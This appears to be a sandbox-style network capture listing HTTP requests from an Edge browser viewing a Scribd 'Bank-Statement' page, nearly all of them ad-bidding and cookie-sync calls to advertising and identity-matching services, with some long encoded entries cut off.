Source: global trafficHTTP traffic detected: GET /api/v1/openx?openx_id=9a3d7e45-fe92-4955-bc1d-9f0d63173aaa&id=AU1D-0100-001739863021-EHT1L4CA-5M76&auid=AU1D-0100-001739863021-EHT1L4CA-5M76 HTTP/1.1Host: ids.ad.gtConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: au_id=AU1D-0100-001739863021-EHT1L4CA-5M76; au_3p_check=1
Source: global trafficHTTP traffic detected: GET /api/v1/son_match?id=AU1D-0100-001739863021-EHT1L4CA-5M76&uid=7ba61469-fd38-491b-a31e-2e21959f08cd&gdpr=0 HTTP/1.1Host: ids.ad.gtConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: au_id=AU1D-0100-001739863021-EHT1L4CA-5M76; au_3p_check=1
Source: global trafficHTTP traffic detected: GET /?pubid=11280&gdpr=0&gdpr_consent=&redirect=https%3A%2F%2Flive.primis.tech%2Flive%2FliveCS.php%3Fsource%3Dexternal%26advId%3D93%26advUuid%3D%7Bviewer_token%7D HTTP/1.1Host: csync.loopme.meConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: POST /api/v1/event HTTP/1.1Host: p.ad.gtConnection: keep-aliveContent-Length: 275sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Content-type: application/jsonAccept: */*Origin: https://www.scribd.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /usermatchredir?s=191923&gdpr=0&gdpr_consent=&cb=https%3A%2F%2Flive.primis.tech%2Flive%2FliveCS.php%3Fsource%3Dexternal%26advId%3D99%26advUuid%3D HTTP/1.1Host: ssum-sec.casalemedia.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: POST /ut/v3/prebid HTTP/1.1Host: ib.adnxs.comConnection: keep-aliveContent-Length: 919sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Content-Type: text/plainAccept: */*Origin: https://www.scribd.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: XANDR_PANID=yoDWIi40QA0l92CMfnRGTVK6j8ph7xMEE2hovwWpxM3jlu8-JszEEuNouxtI9R3D-QUOCwsGww6GCGm89qzRlyyUz_8TuJUoh7BvVk-kenM.; receive-cookie-deprecation=1
Source: global trafficHTTP traffic detected: POST /translator?source=prebid-client HTTP/1.1Host: hbopenbid.pubmatic.comConnection: keep-aliveContent-Length: 1627sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Content-Type: text/plainAccept: */*Origin: https://www.scribd.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /openrtb/pbjs?s=1065814&v=8.1&ac=j&sd=1&nf=1&r=%7B%22id%22%3A%22164288365a8a6e%22%2C%22site%22%3A%7B%22page%22%3A%22https%3A%2F%2Fwww.scribd.com%2Fdocument%2F806838445%2FBank-Statement%22%7D%2C%22ext%22%3A%7B%22source%22%3A%22prebid%22%2C%22ixdiag%22%3A%7B%22mfu%22%3A0%2C%22bu%22%3A0%2C%22iu%22%3A1%2C%22nu%22%3A0%2C%22ou%22%3A0%2C%22allu%22%3A1%2C%22ren%22%3Afalse%2C%22version%22%3A%227.16.0%22%2C%22userIds%22%3A%5B%22pubProvidedId%22%5D%2C%22url%22%3A%22https%3A%2F%2Fwww.scribd.com%2Fdocument%2F806838445%2FBank-Statement%22%2C%22tmax%22%3A3000%2C%22syncsPerBidder%22%3A5%2C%22pbadslot%22%3A%22%2FPRM%2F115858%2Fwww_scribd_com%22%2C%22adunitcode%22%3A%22adUnit_1%22%7D%7D%2C%22imp%22%3A%5B%7B%22id%22%3A%2220e8c6aec0dff9%22%2C%22ext%22%3A%7B%22siteID%22%3A%221065814%22%2C%22tid%22%3A%2260b34a7d-900d-45c2-b5a1-33e470f85867%22%2C%22sid%22%3A%22300x169%22%2C%22fl%22%3A%22x%22%2C%22gpid%22%3A%22%2FPRM%2F115858%2Fwww_scribd_com%22%7D%2C%22video%22%3A%7B%22playerSize%22%3A%5B%5B300%2C169%5D%5D%2C%22mimes%22%3A%5B%22video%2Fmp4%22%2C%22application%2Fjavascript%22%2C%22video%2Fwebm%22%5D%2C%22minduration%22%3A1%2C%22maxduration%22%3A200%2C%22protocols%22%3A%5B1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C11%2C12%2C13%2C14%5D%2C%22linearity%22%3A1%2C%22api%22%3A%5B1%2C2%2C7%5D%2C%22placement%22%3A1%2C%22plcmt%22%3A2%2C%22startdelay%22%3A0%2C%22skip%22%3A1%2C%22playbackmethod%22%3A%5B6%5D%2C%22w%22%3A300%2C%22h%22%3A169%7D%2C%22bidfloor%22%3A2.7%2C%22bidfloorcur%22%3A%22USD%22%7D%5D%2C%22at%22%3A1%2C%22source%22%3A%7B%22ext%22%3A%7B%22schain%22%3A%7B%22ver%22%3A%221.0%22%2C%22complete%22%3A1%2C%22nodes%22%3A%5B%7B%22asi%22%3A%22freestar.com%22%2C%22sid%22%3A%221651%22%2C%22hp%22%3A1%7D%5D%7D%7D%7D%2C%22user%22%3A%7B%22eids%22%3A%5B%7B%22source%22%3A%22id5-sync.com%22%2C%22uids%22%3A%5B%7B%22id%22%3A%22ID5*R7fkB7XeO_2RmiPyJ2jLs9PMSNV9asnfuFIQzGXBAzn6ZdNgdq7r9JGgath5MWwB%22%2C%22ext%22%3A%7B%22linkType%22%3A1%7D%7D%5D%7D%2C%7B%22source%22%3A%22pubcid.org%22%2C%22uids%22%3A%5B%7B%22id%22%3A%229a9e0580-b86e-4be4-bde2-4fffcc767fe0%22%7D%5D%7D%5D%7D%7D HTTP/1.1Host: htlb.casalemedia.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Content-Type: text/plainAccept: */*Origin: https://www.scribd.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /v/1.0/avjp?ju=https%3A%2F%2Fwww.scribd.com%2Fdocument%2F806838445%2FBank-Statement&ch=UTF-8&res=1280x1024x24&ifr=true&tz=300&tws=1232x910&be=1&bc=hb_pb_3.0.3&dddid=47595e98-336a-411f-9864-0e5373a8da7e&nocache=1739863023418&id5id=ID5*R7fkB7XeO_2RmiPyJ2jLs9PMSNV9asnfuFIQzGXBAzn6ZdNgdq7r9JGgath5MWwB&pubcid=9a9e0580-b86e-4be4-bde2-4fffcc767fe0&schain=1.0%2C1!freestar.com%2C1651%2C1%2C%2C%2C&auid=561342919&vwd=300&vht=169&aucs=adUnit_9&aumfs=2700 HTTP/1.1Host: freestar-d.openx.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Content-Type: text/plainAccept: */*Origin: https://www.scribd.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /track/cmf/generic?ttd_pid=tapad&ttd_tpi=1&ttd_puid=6ca034eb-2728-4fa9-b456-793a6491b4b3%252Chttps%25253A%25252F%25252Fids.ad.gt%25252Fapi%25252Fv1%25252Ftapad_match%25253Fid%25253DAU1D-0100-001739863021-EHT1L4CA-5M76%252526tapad_id%25253D6ca034eb-2728-4fa9-b456-793a6491b4b3%252C&gdpr=0&gdpr_consent= HTTP/1.1Host: match.adsrvr.orgConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /getuid?gdpr=0&gdpr_consent=&redir=https%3A%2F%2Flive.primis.tech%2Flive%2FliveCS.php%3Fsource%3Dexternal%26advId%3D121%26advUuid%3D%24UID HTTP/1.1Host: eb2.3lift.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: tluidp=1275989254868253457531
Source: global trafficHTTP traffic detected: GET /live/liveInternalSsp.php?sspData=%7B%22enc%22%3Atrue%2C%22comp%22%3Atrue%2C%22data%22%3A%22%5C%22rJmgW2gi2mvm%2FwXFaiMCFvTs8mFk6zmn3DZO2dJsCxdvoW50W4eK7qsij4gIlaHnJE2LaiPWMGlnHA45j5zHQ2e8ZeL3cg%2B%2Fculsojn7hijyCxolq3%2BGm5jVrlmVmnGhvci7r9gDMUwKcuAqGfFERb9bbShw0FTs6N%2F99isngI%2FDN5N9Q8JSYnbHybll1qbMEI13qGVqxYQrzdaupmQNRkM7o9V6pVqRJkzcFQiVsM1SWc5ybMycIRmqQDrmlanoBfNkEPUHQTTFjKo7vcoglAMmR5JVn9I%2FbKXgrozj9Cz9ZtxVquuTLW7F%2FxnLId6iRKyzbPXNl5inWlKnehufmphpNoxyKzio%2FcEVKXeYJbkl6yciNye11I7LyGnWkhP6tsKnyWYq8RzFAQTh9vVFflSJnLt3lQ2nGsvsxNjJnqfovLn7jvLYchPlazUZrqOsw%2BRY4s9YtpKTC3lbKQktqlEnkxNqiB0P%2Fkqsh1WV0Y80sf%2FAom4nTILBWLJ4%2F%2BsF8ZEnMMmYFnYRHgDxdcRqyCcRM4%2BvSQDWnfjFWRLOsBZi05Wy6YsDUTB0kcYRN%2FguGElvPad0oZ7lrcNuEIZw10vdnegW0OCZgd1zNQTfOBbI95bvmXkPWAgR1nb4k%2Fiz5vnbE87vNEuKGMj8LZNGWw2K03A8HUlHQ%2Fw7sI8UV72FIEK5uD%2BTuSt5irRo7AONZ5kqx%2BTheMkYpeqqxPdMgBCl0QTec1yZooMogbQFPKl83fJHCGPrTvroZzhJOV1S7uiddldeIvh3zK%2FKrZVWZf5GSFxkK4in9kmPTw7SM1LXB7nXqF3oaCSVUn5uJvfrZZnWOWFOyZhCGKboGgqMOOxVGo2Seghud2xCbDBYogF0UTY8pZ0Pm9kpl2cwfx3wWqN4Et8HA5e2u%2F1I9Vpx9FZpAypO0ko3Rag6c6d747B01KiivdQmQ7Ds7OYNrLt%2F%2Bf%2F5ZHz1N%2FyET7%2F0m3N2qirh%2F%2FqRiXN2iDw5fEPdYgaMD%2F%2B6P%2Fv0g3gswD%2BaJ6i0ajasrXrjIzI9Oi54Imz2czhB3%2BtCM%2Fq31bjVV253vhQhvsqIsYJ%2Bz0kVElpfDUbOiHdSRDgxu4oYPXikqEk7j5tOr3FK%2B73upeyMxfy4fdQO8wfmgyPBc44WODk9N8iKG9dNGVInN6iDYyalaIvgwvzNc8WjKBcNR1PwUx2pfXbgF9PfaZOqCRkFO%2FPK53W56J18pIZD8bdjVqFKefSrDtYTNWZoITuJewj4nHiNOs1aRdb3t31IMOeP8Tyh2mCTjo7uNFnBRa83VZXRcD8nT8phsKb4wVy6UgsVYZHS245OiJ7WRTs7c5S0fKhXeT4X8o6gNJl4egh2Y6BcQYaYnGdDLoR%2ByM0P%2B3zldwYweg%2B0tGg2mA47tEOtQyBrxGlihnP8pui8U%2BwF3%2FiAQNcG1kqJdi3YLP0YLkMUJXoWMOaW%2FzKSgufEna3eWcpVu4W1mF2Hzf6mfwQG0A%2Bjdrgke8%2Fc9WJNOIWYaM4R37RE%2FbAo7ybRLtePzaYp5aLDmenFjY4LKB9YhTSG0Xv040lBFzyVQd29ktVmpbhkOjkWb4CkBV1FmzHuRY0IRU%2B%2Fl4b2e8nKjJd%2Fy1aVBhQlHLXMnynfMbsgJF1xcRqiAQ0Q%2FPgWHT9dp2e3c4U7N5u4H9NooeECVf9LQOguUQgOvTKpjr6SZDVzb6jdWohq8pFRKiIvZYvMjLTqHt3WF5BlE5qJwnwTMFulSzgBrHs%2F9OSKkvNaYGfTGCcYoipGak0pIGq1IGvvmypPhByt3poOowvPa5lMTKY5lo0zgmLTjTAniuL8Kx5o4Hqa9H3j6%2Fs%2FurBXvsfD4VqjBtiN2FJ8BYAHUWuPcU8C4FV5HTCyLR3cyqqATE4CV%2F%2BTxDwljg9gUOjOp4%2FueAiyRXYoDJlz5aUsyHPSJCdlGpmeBdqQubfU6H2jP%2FR0%2FtwhivoeBmw8CflsuMhWlDN2HA4BOV%2FOT0%2B%2ByI1jKPbCcDoz8BhcskJSw8LJKlG15iQAdpquFLzoxOpwqos%2Fe4PUWgjsvNQlaebNCheq0XSw5NFjnGojNJCWR%2FUNbCYMOz%2FPxD8eWMnJ70aB8wpwYnjW2abUN75R4KyLunJbREz72NMwYfzSNujMrwqj9rrlsTj6swowF2CaOS7%2Fkf6suJ2TaVBZ6%2Fqwc%2Bo0EDgH476LWF6AaZ3%2Bij52naG%2Ftc3lfyao1jiBx6%2FikDbiC3fTfA1A3Q3TUjD0Z0WjxUPAB%2FtIL3Rh%2BE18ND4v8oGHIDCI%2BG3A8ODKRITPkpnWXsMpZb8wbzFHdvrjr1JxKfwKM00pQgXmk6%2FpiDvSF4Bgr0H1%2Fj1fXkEqX%2BfOQHPnub4D7%2FDlEaT0%2Bi9K6PvNO4DiRfqntbeAA9Fzgs6%2FB5Al6a0SQMLaiqX4sDE%2BPkJ3sm3wBvAWGQ8rKzirFAmhWxiozF9H7ZH6Tu%2BbD%2B6Od%2F7Vjw2u%2BPZ1jChP85W7tqpZ6QVj%2FPsJ%2FDIpadov0%2Byj%2F3MUVa8V92SkcmTlAiRgo6q%2Bb%2B8w6DfN9U3Y96Oi5eQFsnpTXKg%2FB%2Fe6%2FX8q9NXv%2FfBm%2FZNC01EYPtN5YXIyX7O87eDpOOiHVNR1WXRH9p%2F%2FLsulfgHmM8aI5iN9OJ5PfxmVZn9aD6kIjDm7lU%2Fviub9P%2B924o87rc4M8VTl69GmJXxBsxqgxhHih4bssVsR9bpVYHx6hZ
Source: global trafficHTTP traffic detected: GET /e/dtb/bid?src=600&u=https%3A%2F%2Fwww.scribd.com%2Fdocument%2F806838445%2FBank-Statement&pid=neWey2eWlAyS2&cb=0&ws=1x1&v=25.205.027&t=2000&slots=%5B%7B%22fc%22%3A%22USD%22%2C%22fp%22%3A400%2C%22id%22%3A%22aps_primis_oustream_ron%22%2C%22mt%22%3A%22v%22%7D%5D&pj=%7B%22device%22%3A%7B%22sua%22%3A%7B%22architecture%22%3A%22x86%22%2C%22bitness%22%3A%2264%22%2C%22mobile%22%3A0%2C%22model%22%3A%22%22%2C%22source%22%3A2%2C%22platform%22%3A%7B%22brand%22%3A%22Windows%22%2C%22version%22%3A%5B%2210%22%2C%220%22%2C%220%22%5D%7D%2C%22browsers%22%3A%5B%7B%22brand%22%3A%22Microsoft+Edge%22%2C%22version%22%3A%5B%22117%22%2C%220%22%2C%222045%22%2C%2247%22%5D%7D%2C%7B%22brand%22%3A%22Not%3BA%3DBrand%22%2C%22version%22%3A%5B%228%22%2C%220%22%2C%220%22%2C%220%22%5D%7D%2C%7B%22brand%22%3A%22Chromium%22%2C%22version%22%3A%5B%22117%22%2C%220%22%2C%225938%22%2C%22132%22%5D%7D%5D%7D%7D%7D&schain=1.0%2C1%21freestar.com%2C1651%2C1%2C%2C%2C&sm=65ca3305-e2a6-4f6e-bcea-68b1d4844783&pubid=0ab198dd-b265-462a-ae36-74e163ad6159&gdprl=%7B%22status%22%3A%22no-cmp%22%2C%22cmpTimeout%22%3A75%7D&vm=%7B%22ids%22%3A%7B%2233across%22%3A%22v1.0013300001cFpYHAA0.1038.AtjE%2FtYZclpHZTuhg08WvS%2BrkN1XuoF8WPbeTn2c0swAqam3hWyM%2FHUVb0PKRGaBQFi8RB9%2F9mk7jFRKDMeWXQ0QU38sF8eDZIuqDFk7ypGKuR0uDV%2FeRQQgnWoY%2BVzYrCwbcNs9BHj5%2BM9GkNbQqVCfWff3%2FAWLyR7mN9vjptBuLcXfJhOwfZwAyeBn2HNQRMRgYvzBdsGCaciE94zJmhsh6pOoEe7HU7ElL0RuvHrTTK2SwQzSXYsWu4ZioCIc%2BJleDAkia939%2FsJ2%2BMbwkJbcBoFT27s7rNNVSBjcnBbO5%2BhGxeQctwnKMU5F9XddHmf8XXCYVpBLJCF7u7c3tan5mf%2FVqOVKhhfcT%2BWUgdabw7bHZviso6vS1wXNp3487P%2BdV1frgDDSltmI%2FlJfCgf%2Bj33PqUgdq%2B21Xm9ZQPgKC%2FAfkhqldmQSgS1C91x6t1Bk0woRjR0diDJiI%2BdziyvmYAgZTXFBzY6TFAtspdNTuQSyjE%2B%2Br6C%2BY%2FRav%2BneSD3%2BoB%2FdLn6ry6XPzR7Vt2c%2F0lWQ3QsXDFL4gRHrPcCesfZgNXQtF3KE6jgqxLBM2eOnaeZakKLQxnR0pC8z7hamosfCWU1CvPWbTxVwmcTm2oNKQuvDeXqdQUjgpV7HqrmBUtWX2dsTY1BQyLIpFxvv9zDLZupu7ixNzKRkIw4kBwqejQ%2Bcn496EBQanMTYijYqbyUl6b6Moafa5yeK1GSHI2%2Fqg0hnASlXt%2BdNqUgU%2BJQ1d2sXxzZrJLcDbVqPk0cyf74tHU4D91F1qn10Z6S3pSlbnbk7ur16jm7wDnBUqFvhuaJNYYudwQ%2BvESloQ1qCRHkhwBJAIDyvG8T3qfdl2ZiRx4d6DRTgPy%2BDuDfrx%2FCEU%2BZiVQ1I6oQWA5nEHIPfeWoIG%2FmIiyrS1iL8PtziGxGytGJ3XXr5nN2I0I976etf14BFMNbVWbRHcxjiXFncY2cLOSbTudgJsd%2F1bm8LsIDT4uhC0QFq%2BXTQGrW%2F8w7LslyKA7wlFm3sI%2BbH%2FnVvQ38YMVaI0aerS60syHeqwbtFeHGEkled968aSJhZ8ePbsE94vjhxQ9WxswWHYi8V45zfvZts0IBt70GrBj5Xw%2Bc8Hh5u039gltPgoc3ggtuhJICeeUvehNhPUP6v9MRHSdcYDbiD24q7H1rxHlSgfbvJDbsaLeuC0ExBHn3AFx81BlTLTLTMcqnjNpnsoCKBU%2Fv7gcWXKrGPsKtnUDyQt%2BxCUI6aIH204f1DitNhk0eCV7JIvG%2F1Us5cmBEGqEqVBtqaxHn4TlI6frGr1uWuoPn%2FERe5eg6Bk%2B935G4%3D%22%2C%22audigent%22%3A%220001yum0ea99jha6clfcgeaikjhlll68igi8eiflgfabackkc2jl%22%2C%22fabrick%22%3A%22E1%3AnNcB-cR8zPZwco1L1Geu05lKPr6rK26CHhDENyHqDRcdlSbAj5oaaihbgTrx6yx5Af_UxV2yvFbtfJT9wfoas06Atnb_KaBgHyrLSy5Lnn9g_jiTjS2RFPEkU7xm0SDR%22%2C%22id5%22%3A%22ID5*R7fkB7XeO_2RmiPyJ2jLs9PMSNV9asnfuFIQzGXBAzn6ZdNgdq7r9JGgath5MWwB%22%2C%22pubcommon%22%3A%226dbf4d45-833c-454c-b334-fbf51bba1aa6%22%2C%22quantcast%22%3A%22P0-761217323-17
Source: global trafficHTTP traffic detected: POST /gm/v3 HTTP/1.1Host: id5-sync.comConnection: keep-aliveContent-Length: 1105sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Content-Type: text/plainAccept: */*Origin: https://www.scribd.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /ups/58818/sync?redir=true&gdpr=0&gdpr_consent= HTTP/1.1Host: ups.analytics.yahoo.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /exchange/sync.php?p=primis&gdpr=0&gdpr_consent= HTTP/1.1Host: pixel.rubiconproject.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: audit_p=1|p3NZOIPdcs7g2WF2nGvUU+SRTrMPTneuTTZKI3TR72YkDyl9IZRjbpAY6ebCcuOOjxj9g7jJDXlCbuL7wqM7W24/AOYgyMTzmjbisE4m2Mfme0rGRDIQp2HZvLHXgE7qKreeM+I17A+st7tELqFbcc9dWb1LRf1hfY0V14FIbwNNc4QTpadywtzpQ7vzkXQ/; khaos_p=M7A5IT3R-G-GNOQ
Source: global trafficHTTP traffic detected: GET /track/cmb/generic?ttd_pid=6gvshk1&ttd_tpi=1&ttd_puid=67b433ed2421e&gdpr=0&gdpr_consent= HTTP/1.1Host: match.adsrvr.orgConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /live/liveCS.php?source=external&gdpr=0&gdpr_consent=&advId=98&advUuid=35b1ff19-ce3f-4652-8688-79bcb2c9acd3 HTTP/1.1Host: live.primis.techConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: csuuid=67b433ed2421e
Source: global trafficHTTP traffic detected: GET /getuid?https%3A%2F%2Flive.primis.tech%2Flive%2FliveCS.php%3Fsource%3Dexternal%26advId%3D105%26advUuid%3D%24UID%26gdpr%3D0%26gdpr_consent%3D HTTP/1.1Host: ib.adnxs.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: 